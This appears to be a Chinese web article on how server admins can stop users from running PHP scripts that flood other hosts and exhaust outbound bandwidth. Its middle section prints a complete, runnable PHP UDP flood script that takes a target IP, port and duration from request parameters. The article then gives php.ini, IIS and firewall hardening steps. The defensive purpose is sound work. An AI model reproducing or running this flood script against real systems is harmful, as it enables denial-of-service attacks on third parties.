微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

防止用户利用PHP代码DOS造成用光网络带宽

PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
<div class="codetitle"><a style="CURSOR: pointer" data="79557" class="copybut" id="copybut79557" onclick="doCopy('code79557')"> 代码如下:

<div class="codebody" id="code79557">
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\",$rand,$errno,$errstr,5);
if($fp){
fwrite($fp,$out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024,2) . \" mB) packets averaging \". round($packets/$exec_time,2) . \" packets/s \n\";
?>

表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.

解决办法:

禁止上述的代码:
在c:\windows\PHP.ini里设置:
disable_functions =gzinflate;
在c:\windows\PHP.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=PHP_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留

然后重启IIS


如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
另外,对于没加密的PHP攻击代码,还可以用以下办法处理:
1.在IP策略,或防火墙中,禁止所有udp向外发送
2.用一流信息监控,在sql拦截及网址拦截中,拦截port=这个关键词

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐